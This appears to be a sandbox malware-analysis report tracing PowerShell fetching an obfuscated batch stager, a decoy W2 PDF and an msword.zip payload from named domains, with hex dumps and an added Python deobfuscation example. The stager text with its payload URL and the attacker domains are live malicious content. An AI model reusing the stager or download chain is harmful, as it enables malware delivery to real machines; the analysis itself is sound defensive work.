                                                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                      Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 193.26.115.39 | 443 | 7384 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 21:52:58 UTC | 168 | OUT | GET /c2.bat HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                      Host: candwfarmsllc.com
                                                                                      Connection: Keep-Alive
2025-01-11 21:52:59 UTC | 288 | IN | HTTP/1.1 200 OK
                                                                                      Date: Sat, 11 Jan 2025 21:52:58 GMT
                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                      Last-Modified: Tue, 07 Jan 2025 14:48:52 GMT
                                                                                      ETag: "e32-62b1ed7f84eca"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 3634
                                                                                      Connection: close
                                                                                      Content-Type: application/x-msdownload
                                                                                      2025-01-11 21:52:59 UTC3634INData Raw: 40 25 56 4c 75 78 44 78 42 4d 25 65 25 7a 6b 6e 68 74 72 74 69 25 63 25 71 58 49 65 25 68 25 44 69 6f 55 70 72 62 25 6f 25 6e 46 25 20 25 58 53 7a 70 4a 75 4a 25 6f 25 5a 25 66 25 64 4c 25 66 25 65 45 4d 42 25 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 25 4f 66 52 5a 68 25 65 25 62 7a 68 6b 72 75 53 59 25 74 25 44 6b 75 74 4b 64 25 20 25 64 78 44 48 25 75 25 4b 7a 47 25 72 25 4b 47 75 57 67 70 42 6d 4d 6f 25 6c 25 61 64 71 50 68 42 77 52 25 3d 25 59 4e 4d 6a 6d 25 68 25 72 74 52 4c 74 50 4a 65 52 25 74 25 44 53 66 57 7a 53 25 74 25 79 59 79 25 70 25 41 42 54 4d 57 58 75 41 73 25 73 25 6d 25 3a 25 4d 49 25 2f 25 53 6e 42 6c 25 2f 25 74 74 6d 25 6d 25 67 76 74 25 79 25
                                                                                      Data Ascii: @%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%set url=https://myguyapp.com/msword.zips%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%
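The Data Ascii above is a batch file padded with `%NAME%` references to variables that are never set. Inside a batch file cmd.exe expands every such reference to an empty string, so the first line is really `@echo off` and the third line, as far as the dump goes, is another `set url=https://my`. The script below recovers the clean text. It is an added example, not code from the report or from the sample; SAMPLE is the fragment shown above with the line breaks restored from the `0d 0a` bytes in Data Raw and cut where the report's dump is cut. It models only the expansion rules this trick relies on (undefined names vanish, `%%` is a literal percent, a stray `%` is dropped) and keeps references to names an earlier `set` line defined, so a genuine `%url%` later in the script would survive.

```python
"""Strip the dead %NAME% references from an obfuscated batch stager.
Added example, not from the report or the sample.  SAMPLE is the /c2.bat
fragment from the report's Data Ascii, line breaks restored from the 0d 0a
bytes in Data Raw and cut where the report's dump is cut."""
import re

SAMPLE = (
    "@%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%\r\n"
    "set url=https://myguyapp.com/msword.zip\r\n"
    "s%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%"
    "h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%"
)

# One match per token: an escaped percent, a %name% reference, or a stray %.
_TOKEN = re.compile(r"%%|%([^%\s]*)%|%")
_SET = re.compile(r'\s*set\s+"?([^=\s"]+)=', re.IGNORECASE)


def deobfuscate_batch(script):
    """Expand the script as cmd.exe does inside a batch file: a %name% that
    was never 'set' becomes empty, %% is a literal percent, a stray % is
    dropped.  References to names an earlier line did 'set' are kept as
    written so the real data flow stays visible."""
    defined = set()
    out = []
    for raw in script.splitlines():
        def expand(m):
            if m.group(0) == "%%":
                return "%"
            name = m.group(1)
            if name is None:                  # lone %, no closing %
                return ""
            if name.lower() in defined:
                return m.group(0)             # genuine variable reference
            return ""                         # never defined: expands to nothing
        line = _TOKEN.sub(expand, raw)
        m = _SET.match(line)
        if m:
            defined.add(m.group(1).lower())
        out.append(line)
    return out


def find_urls(lines):
    """URLs left standing once the padding is gone."""
    return [u for line in lines for u in re.findall(r"https?://\S+", line)]


if __name__ == "__main__":
    for line in deobfuscate_batch(SAMPLE):
        print(line)
```

Variable names with spaces and delayed expansion (`!name!`) are not modelled; for a stager like this one, plain `%name%` padding is the whole trick.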


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 193.26.115.39 | 443 | 7576 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 21:53:01 UTC | 163 | OUT | GET /W2.pdf HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                      Host: myguyapp.com
                                                                                      Connection: Keep-Alive
2025-01-11 21:53:01 UTC | 282 | IN | HTTP/1.1 200 OK
                                                                                      Date: Sat, 11 Jan 2025 21:53:01 GMT
                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                      Last-Modified: Tue, 07 Jan 2025 19:23:04 GMT
                                                                                      ETag: "10f3d-62b22ac96cf3c"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 69437
                                                                                      Connection: close
                                                                                      Content-Type: application/pdf
                                                                                      2025-01-11 21:53:01 UTC7910INData Raw: 25 50 44 46 2d 31 2e 34 0a 25 e2 e3 cf d3 0a 31 20 30 20 6f 62 6a 0a 3c 3c 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 57 69 64 74 68 20 32 35 34 39 2f 48 65 69 67 68 74 20 33 32 39 39 2f 4c 65 6e 67 74 68 20 33 35 36 37 38 2f 43 6f 6c 6f 72 53 70 61 63 65 5b 2f 49 6e 64 65 78 65 64 5b 2f 43 61 6c 52 47 42 3c 3c 2f 47 61 6d 6d 61 5b 32 2e 32 20 32 2e 32 20 32 2e 32 5d 2f 4d 61 74 72 69 78 5b 30 2e 34 31 32 33 39 20 30 2e 32 31 32 36 34 20 30 2e 30 31 39 33 33 20 30 2e 33 35 37 35 38 20 30 2e 37 31 35 31 37 20 30 2e 31 31 39 31 39 20 30 2e 31 38 30 34 35 20 30 2e 30 37 32 31 38 20 30 2e 39 35 30 34 5d 2f 57 68 69 74 65 50 6f 69 6e 74 5b 30 2e 39 35 30 34 33 20 31 20 31 2e 30 39 5d 3e 3e 5d 20 31 28 00 00 00 ff ff ff
                                                                                      Data Ascii: %PDF-1.4%1 0 obj<</Type/XObject/Subtype/Image/Width 2549/Height 3299/Length 35678/ColorSpace[/Indexed[/CalRGB<</Gamma[2.2 2.2 2.2]/Matrix[0.41239 0.21264 0.01933 0.35758 0.71517 0.11919 0.18045 0.07218 0.9504]/WhitePoint[0.95043 1 1.09]>>] 1(
                                                                                      2025-01-11 21:53:01 UTC16384INData Raw: f1 bb f4 48 93 6a ef 97 6c 9b 5f 72 d9 f9 bd ed fd d4 de 68 fd e9 ff 30 dc 89 7e 5b 33 f6 fb 5f 9b ec a8 2d 3a bf 13 62 79 c6 cb 1f 87 bd df ff 1c b7 70 aa ca 15 61 fd 69 f4 2b 13 93 d6 d1 ef 70 2b fc 8c 4a 3b bf 6f d4 41 f0 73 61 61 ad f7 4b 86 3b 59 e5 db b1 5f de aa 5c bf e0 89 2c cd e4 f1 60 a5 6a 9a d0 4c 7a 3f 9a 9f 0e 3f a6 b4 d5 d8 2f 35 ea a7 34 f8 4d 9e b6 5f 4d 23 fd 94 37 89 65 bc 94 5a 17 f5 f7 ca 2a 93 d0 0c 07 6f f7 70 d9 61 58 76 d5 e9 70 27 a3 94 7a a3 2a fa 6f 5f 39 55 d5 85 56 85 21 33 de 48 a7 e8 71 3a a9 8b d3 9c f8 0f e8 7f 15 3d f8 82 7f 4c 9b b7 f4 c7 a0 27 e5 87 f9 fa ff 45 cf f5 4b c6 3f 8f 77 41 7a c2 7e a4 41 bf 77 9d b8 b0 fd f2 0f 2a ab df 24 5a fd a4 7e 0e 83 0e 6f bf f4 3c d0 99 6c b8 53 4d 7e af d4 73 f5 9d fa 81 be f2 12
                                                                                      Data Ascii: Hjl_rh0~[3_-:bypai+p+J;oAsaaK;Y_\,`jLz??/54M_M#7eZ*opaXvp'z*o_9UV!3Hq:=L'EK?wAz~Aw*$Z~o<lSM~s
                                                                                      2025-01-11 21:53:01 UTC16384INData Raw: 1a fd 5a 3e 03 f8 6e f9 d5 fd 03 3a bf fd e8 f7 c1 eb 99 9f 4d c9 cf 54 dd f8 8f 6e 99 f3 bb 81 1f 17 fc ec 8b fd 67 9d df c9 cc 4f ff e5 cc ef 90 16 52 e6 fc 4e 6e 7c bc 7c c1 ff f7 3b ee f7 dc 7d ef a3 5f 36 f3 3b 39 9d f3 cb e6 fd ae e0 17 1e c9 33 82 83 1f 4d 74 67 7e d3 91 5f c3 b7 8c fd 9a 3b fc 76 64 f9 77 de cf 7d e7 be f1 c1 cf 96 33 bf 7c e4 47 cb 1f e5 9c 5f bb db 7e c3 f4 37 fa fd 33 de fc c8 7e 4b f3 7f 9d 9f 2e e3 fc 5f eb 3f 76 7e 7f c5 eb f0 bb e9 07 3f 11 f9 55 99 77 bb e6 67 69 40 ab c8 8f bf 27 3f 3d 9b ff b3 61 fe cf 94 9d 9f f6 d1 ef 26 fa 69 f6 fb d8 fb 7d 64 3f 47 7e 36 ac 4f 7c 72 3d 7e f9 83 fc e8 f7 4d 1f f2 33 45 f4 d3 55 ef 57 f8 78 99 97 df aa 9b e0 47 ef df df c8 6f 17 d6 9f 0e cb bf 2e e3 1d 82 d2 b0 37 c1 2a bf b8 fc 56 d8
                                                                                      Data Ascii: Z>n:MTngORNn||;}_6;93Mtg~_;vdw}3|G_~73~K._?v~?Uwgi@'?=a&i}d?G~6O|r=~M3EUWxGo.7*V
                                                                                      2025-01-11 21:53:01 UTC16384INData Raw: c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 d1 0f 8b 7e 58 f4 c3 a2 1f 16 fd b0 e8 87 45 3f 2c fa 61 1d da 6f 70 8a f6 6d 33 d2 1d da 2f 1d 98 08 bb 61 46 ba 83 fa 39 85 d6 07 b9 5f e2 b4 e7 bf bf 65 46 ba 83 fa 45 ed 61 d7 1a 7f e5 f6 d4 e1 05 33 d2 1d d4 2f 69 2f f6 5a cb bf c5 f6 17 f8 f8 3d d8 f5 06 9e 36 e8 97 77 58 bf 87 ad cf e9 97 77 58 bf f6 3b 4e d0 2f 8f 7e 58 87 f5 6b 3f 0d d3 2f 8f 7e 58 87 f4 cb e8 d7 df a1 fc b2 d3 b2 f6 3c 93 ea c7 ea 17 07 a6 16 d2 ef 60 d7 3b 57 4c bc c4 89 9d cc 8f 75 5b 44 fd 6a 9e 71 fc 46 32 d2 5b
                                                                                      Data Ascii: E?,a~XE?,a~XE?,a~XE?,a~XE?,a~XE?,aopm3/aF9_eFEa3/i/Z=6wXwX;N/~Xk?/~X<`;WLu[DjqF2[
                                                                                      2025-01-11 21:53:01 UTC12375INData Raw: c3 cc 9c e0 0e ee 37 3d 78 51 6c b6 7b 3e db ee ff 62 35 ff fa 7d f9 30 35 27 b8 83 fb f9 83 17 d1 cf 1c c2 2f 0b 06 2f 8a fb 1e b3 1b fd 5f ac e6 5f d7 41 9b 98 13 dc 81 fd d2 c1 d5 17 13 87 bd cb bc 21 7e 21 fd 3a 55 f6 2a c4 41 af df c0 73 6d 35 ff ba ae 73 c7 e6 04 77 60 3f 19 5f a9 6b 36 23 93 be 6b ca 26 3b 2d 2e b2 44 4c 7c 13 05 69 6c 6a 66 d1 24 9e b9 9f 6f a3 c4 81 f5 f3 4d e6 99 5a 18 19 53 34 27 b5 03 fb c9 ea 5f 5c 30 f5 72 18 17 32 27 d0 6f 13 2f 13 b9 a6 ec c5 b5 d0 09 1c 2f 2a 9a 37 5f 77 04 d9 d4 dc c4 f1 f5 eb 89 13 3a 7e d9 4d 4f ee 4e 9e 03 fb c9 ea 5f 23 32 45 27 58 69 a4 67 fd 0d 79 50 26 32 aa 96 2a c6 73 6b e5 9b 67 df 73 bc fa 62 fa c6 97 8a fa 90 f5 2a d6 af 28 9b cd 37 df f3 1c 37 89 43 73 42 3b b0 9f 3c 13 ac c4 37 5f bb 1e ac
                                                                                      Data Ascii: 7=xQl{>b5}05'//__A!~!:U*Asm5sw`?_k6#k&;-.DL|iljf$oMZS4'_\0r2'o//*7_w:~MON_#2E'XigyP&2*skgsb*(77CsB;<7_


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 193.26.115.39 | 443 | 7836 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 21:53:06 UTC | 167 | OUT | GET /msword.zip HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                      Host: myguyapp.com
                                                                                      Connection: Keep-Alive
2025-01-11 21:53:06 UTC | 285 | IN | HTTP/1.1 200 OK
                                                                                      Date: Sat, 11 Jan 2025 21:53:06 GMT
                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                      Last-Modified: Wed, 08 Jan 2025 11:47:08 GMT
                                                                                      ETag: "323b00-62b306bdd696f"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 3291904
                                                                                      Connection: close
                                                                                      Content-Type: application/zip
                                                                                      2025-01-11 21:53:06 UTC7907INData Raw: 50 4b 03 04 14 00 08 00 08 00 6e 15 28 5a 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 20 00 6d 73 77 6f 72 64 2e 65 78 65 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 55 54 0d 00 07 d1 56 7e 67 b7 65 7e 67 0b 65 7e 67 ec bd 7b 7c 54 c5 dd 3f 7e f6 92 64 49 36 ec 22 09 46 0d 1a 21 28 ca a5 d1 05 4d 5c d0 05 72 42 b0 59 5c 58 77 17 94 70 51 12 0f 2b 02 4d ce e1 d2 12 25 6e a2 ac 87 b5 d6 da a7 d8 da a7 a6 d8 a7 b6 b5 95 b6 56 a2 22 26 80 24 28 b5 28 3c 98 16 7c 0c 48 f5 ac 1b 75 95 18 16 88 9c ef fb 33 73 36 04 1e 7b fb be be bf ff 7e e1 35 7b e6 cc 99 cb 67 3e f3 b9 cd cc 67 06 ef 1d 8f 09 16 41 10 ac 08 ba 2e 08 ad 02 ff f3 08 ff fc 6f 3f c2 d0 2b 5e 1e 2a bc 30 e4 4f 57 b6 9a aa fe 74 e5 ed d2 b2 fa a2 55 75 2b ef a9 5b 72 5f d1 dd 4b 56 ac 58 29 17 dd 55
                                                                                      Data Ascii: PKn(Z msword.exeuxUTV~ge~ge~g{|T?~dI6"F!(M\rBY\XwpQ+M%nV"&$((<|Hu3s6{~5{g>gA.o?+^*0OWtUu+[r_KVX)U
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: d0 46 19 93 59 4a b1 a4 5f 81 a1 d0 f3 9f 25 94 8f 45 a3 7e 4d 07 1d 69 2d 86 4c 7b 92 79 a4 80 7c b8 85 0b 8d 96 a7 79 40 82 51 0c 18 40 6e 28 9b 40 04 2d 2f 0c 84 b4 67 47 11 78 89 8b d1 cf 42 d6 cf ef 7d 95 86 3e 2b f2 a9 d9 7d b2 fe 6f 34 cc 24 a8 dc 27 eb 56 b0 f9 36 19 ea da 47 e3 d9 8a f9 75 06 c0 77 8f a1 cd 67 e6 2e 32 0f 51 90 84 33 92 fb 1c 89 41 ed de cb c9 b6 40 db 85 da 65 e8 96 b6 f1 2b da 4a dd 4d 96 21 72 39 9a 3e 21 68 69 f3 8f c1 f9 bb 2b 69 be a1 e7 3f 43 7d b3 b1 be 8d 46 85 5c 3e fa d3 bb b2 f2 4b 01 3f e7 13 3f 77 4b a9 2d 9b 40 70 28 39 06 3c 07 8a 99 cf 5c 21 f7 0c 78 bd 98 7c 31 88 c2 6c ab f0 fa 22 5e c3 97 2e da a1 41 fe 30 1f 43 7d 6b 11 09 61 ed c9 f1 dc ef a3 91 c3 26 df 12 36 05 25 12 ec 7a fe d3 dc 17 64 42 20 a8 1d 82 41
                                                                                      Data Ascii: FYJ_%E~Mi-L{y|y@Q@n(@-/gGxB}>+}o4$'V6Guwg.2Q3A@e+JM!r9>!hi+i?C}F\>K??wK-@p(9<\!x|1l"^.A0C}ka&6%zdB A
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: 7d 77 36 5f 5d 7d 77 f7 6e db 2d 3f 16 71 2d 46 ca 48 cb db 8a a3 be 1e 16 e8 25 5f 38 ef 6e ca 95 86 63 ba 9d 37 55 d7 0e 67 38 1e 4a b6 c7 4c 42 bf 5b 4d 2d d9 58 89 cc bf d8 40 0f 9c 12 f2 4f 33 e1 7b 9c 36 9f 53 b2 db 8b c1 fb cc ed fd ac 2a 11 63 cc 77 17 59 75 eb 2b f4 24 02 69 4a 46 1e 7c 6b 1d e3 b2 e8 6a c8 1f 1d 1f 28 c5 e0 c7 da 84 e7 16 be ab 7b 8e c5 8e 07 0d ac 6d ce 15 af f2 4f 05 1e 7f fb 88 eb 6d d5 ea b0 eb 9c ba 94 d8 15 b6 fa 9c 1f 9a 19 6e 6d 2b 11 e7 b4 a4 3f 55 ba 28 bd da df a4 2d c1 5d 93 7e 5e 62 03 9a ad 37 b8 a4 9e 96 5c 79 5f ad aa 28 4b f3 a1 cc 67 6e 65 0f c2 9d f2 62 b3 99 3e 21 3c 67 4d 74 4d 48 cd c5 1a 8c 8d 47 fc 53 37 db b4 ce 9e c2 c3 92 1e fd 2a 02 39 93 24 2f 45 73 c3 b1 f4 60 76 9a 7a a2 4a 21 8e 79 a0 b5 6e 84 57
                                                                                      Data Ascii: }w6_]}wn-?q-FH%_8nc7Ug8JLB[M-X@O3{6S*cwYu+$iJF|kj({mOmnm+?U(-]~^b7\y_(Kgneb>!<gMtMHGS7*9$/Es`vzJ!ynW
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: 0e 8e 26 84 2c 4d 9a d8 ab a5 83 ef a9 f3 e3 3e 64 77 72 1b 27 20 72 e2 0a 46 ba 2b 20 a1 27 7f 3a 2d ac a5 c9 9f f9 d7 6b 44 46 30 01 80 5d 00 00 80 00 00 17 8f fc ea d1 c9 d4 a0 9a 4b 8a c8 55 d4 61 36 95 25 3a ec 89 63 34 2f 2e d3 0b 13 5e 0a 04 ed 93 b6 09 67 06 6c 7e 9e 7a 03 20 24 8d 64 7d a4 84 6c bc cb bd 26 86 a4 ab 2a 60 60 48 3c bb 11 22 14 b9 3e c3 4e 69 8e 7d 88 fa c5 6b 30 2e 94 79 8a 8f c7 be 40 30 35 b6 ff 83 9b 98 42 3f 9b 7d 26 e4 c5 0d f6 97 84 07 45 4d 35 19 b3 61 67 17 6d 17 29 a8 44 81 c0 ab 7f 61 87 31 42 77 40 1f 67 76 82 9c 4e 8b 49 3a 28 1a 6e 20 d5 2e 30 1d b3 87 e0 7f 21 0d cc 88 e0 ef bc 2e 8e 24 88 77 b4 ee 18 e3 34 45 bf ff 88 70 a8 fa 3b 61 0c 8c ce 2a 35 ab b5 12 74 35 f4 32 8d 27 d2 d6 b5 99 dc 15 f3 c8 d3 ca a2 0c 00 e6
                                                                                      Data Ascii: &,M>dwr' rF+ ':-kDF0]KUa6%:c4/.^gl~z $d}l&*``H<">Ni}k0.y@05B?}&EM5agm)Da1Bw@gvNI:(n .0!.$w4Ep;a*5t52'
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: fd 6c d1 1e 4d 95 61 60 cc c9 dd e4 ed 8d 20 a4 fc a7 18 78 14 0c 63 74 cf b4 5d 3c 42 70 de 63 d1 42 aa 59 1b 5a 0d ad d7 68 a7 5c 3c 07 d8 9a 1f 81 03 47 19 41 5f 64 6a 52 bc 73 75 22 49 5b 2d 12 e6 b1 85 3b 9c e9 86 64 7e 59 30 dd b4 7f 2e 1c e3 a0 ad 1c 7c fa 96 ee c6 cf d8 ec 97 70 c2 ed d8 bc c7 63 9e 1d 7e 2b d3 95 81 0f 05 d6 04 a1 9f 3f 9f 95 42 ec 74 b5 25 be 6f 15 a2 59 13 70 d7 1f 0f ef 6f 2a 44 d9 36 c4 38 e3 19 8d f8 9a 49 84 fa d6 26 22 84 db 14 a2 24 cd 3f e3 5b 1c ef 7a 61 5f 73 38 30 aa 72 f5 66 bc 44 f6 72 91 3d e1 f8 d1 d2 e4 4c 9b 07 03 b5 c0 cf 09 bf 21 4c a2 9e c8 6f 26 76 73 d5 cc 81 80 a9 89 f2 79 b8 92 5c 34 20 c2 e8 22 c1 8f ef a6 4b 5e 83 f9 73 f5 9f fa 48 cc 22 6b cb d0 5b d0 2e 4a d1 d8 05 ed 00 97 09 8b 3d 2f 8b 31 44 3c f7
                                                                                      Data Ascii: lMa` xct]<BpcBYZh\<GA_djRsu"I[-;d~Y0.|pc~+?Bt%oYpo*D68I&"$?[za_s80rfDr=L!Lo&vsy\4 "K^sH"k[.J=/1D<
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: ae cf 96 ea a2 e6 1c 74 de d0 36 93 a3 8e f2 a3 a3 53 fc 56 cf f6 33 27 7d 25 dc 07 77 11 fd a5 3e 6f c4 30 ca d0 0f 00 12 91 d8 a3 b9 aa 76 2a 87 83 24 59 f3 43 57 3c 23 08 e8 02 a6 44 4b 38 9f f9 57 98 69 28 11 7b 52 bf 91 11 e0 14 eb 06 bf bf 3a 72 35 f6 e0 8b 1e 6b 57 cd 8a 0b 8e 93 ce 78 62 c1 54 8d 83 0a ee 69 af f2 09 06 d2 58 f1 94 41 76 28 3c 06 2d 18 9c fb 12 2f 3e 36 21 d4 2b 86 0f bd 01 ec ec b3 7e 7a 1b 73 a0 ff b9 86 fc e9 23 c0 84 53 63 50 bf e8 fe 73 b8 c4 d0 31 9f 0a 1d 5b e4 19 dd 5d b5 ab 31 fe f9 73 60 6f 0e 74 3f 01 4f b4 1e 15 e4 85 63 0f b6 c6 a2 55 84 0a ca 6e d1 8d 0f 79 24 bc 3b 21 07 17 59 c9 57 59 93 60 b8 67 d9 1f aa 29 22 fc e9 cb 5d 56 26 53 26 0f dd 66 ff 20 f8 9b 3c ea 18 a9 05 d4 a8 9b 8f eb 68 a9 b6 f3 9c 7c 37 c3 49 1f
                                                                                      Data Ascii: t6SV3'}%w>o0v*$YCW<#DK8Wi({R:r5kWxbTiXAv(<-/>6!+~zs#ScPs1[]1s`ot?OcUny$;!YWY`g)"]V&S&f <h|7I
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: 3c cc 6e ab 22 81 0a f6 0b e4 7e 1f 0b 8f 98 40 11 92 4b fc f1 1f 92 cd 16 6f f7 55 1b 26 49 40 1c 09 73 f3 24 8b df 26 1f 01 7b 19 5e 28 e6 8a 3b e1 4a 4a 81 d5 1a d9 0b 29 49 49 f4 38 c4 dc fe ec 56 ff 79 69 f9 69 0d 54 7c 40 2a 18 3f 36 39 37 5a 8f b9 46 14 a9 55 bf 21 5c 7c 97 f6 6b 3c cf 2e cc 69 0c c2 0d fa fb ed f1 bf f9 cb f8 c5 cc a1 55 13 b5 5b 71 91 a9 7c e1 67 10 bd 0f aa 98 e7 f7 b7 00 91 a1 f8 e2 ea 01 65 66 9c 98 e4 b4 74 41 c3 03 a9 28 2e a0 32 8c 8c 21 85 92 d8 53 65 de 2a af bd e0 8a ac c2 ec 33 3b 9c 71 69 43 36 dd 38 b9 3b 48 08 4a 6d 25 bb 3b 85 08 98 a5 e5 7a b3 5a 84 49 33 0a 51 71 47 3c ee e8 09 b7 4f ff 09 18 5f f8 ef be 57 98 30 3c 9f e7 74 d6 f8 ed b9 45 78 e3 3f a0 bb 80 dd 3d d0 86 3e 93 a7 bd a8 31 41 66 e7 37 2e 9d 8b e8 94
                                                                                      Data Ascii: <n"~@KoU&I@s$&{^(;JJ)II8VyiiT|@*?697ZFU!\|k<.iU[q|geftA(.2!Se*3;qiC68;HJm%;zZI3QqG<O_W0<tEx?=>1Af7.
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: 0b 23 32 ca f5 bb 37 8f 91 2b 5e f9 2b c1 c4 93 92 e8 c3 c3 9d 36 82 71 31 79 95 58 8e a6 29 66 f8 b3 2d ab 44 18 71 ec 43 a0 b5 30 06 4e c7 44 48 81 43 b7 a8 04 7c b8 a4 68 fc eb 2e 12 3d c9 4f 4d f8 ed 2b 9b 31 95 77 4c 70 6e a8 b9 30 00 50 94 a7 85 f4 38 35 12 89 4b ff 44 2d f8 40 38 1d 8f 91 29 26 5a 75 65 7b 9f 60 ea ad 34 50 5f a2 8a 0b e1 84 92 97 0a bf 1f f0 02 b0 5f ab 7f 5c 5b 3f 88 5a f2 0e 1c 43 ff e1 be d8 0b 7c 90 73 51 3d ab 28 f0 bb 35 ce 5f 77 72 22 0e 56 28 8a d0 97 e5 31 bb c7 8b 6e 0d 8e 48 62 34 10 bd 4f fd 31 36 f9 f2 63 a5 84 60 70 ed 59 35 89 cf ee 68 15 c1 7d 7e 1d 0c 50 ec d0 62 a9 9e 89 ef 13 01 8e f0 04 25 41 c2 40 67 20 7f 98 a4 c8 6d 76 42 43 30 1e 38 fd dc 07 e2 c7 da c4 76 7e 0d ad fc 0c 53 1a 34 47 ff d8 83 aa d8 10 db 91
                                                                                      Data Ascii: #27+^+6q1yX)f-DqC0NDHC|h.=OM+1wLpn0P85KD-@8)&Zue{`4P__\[?ZC|sQ=(5_wr"V(1nHb4O16c`pY5h}~Pb%A@g mvBC08v~S4G
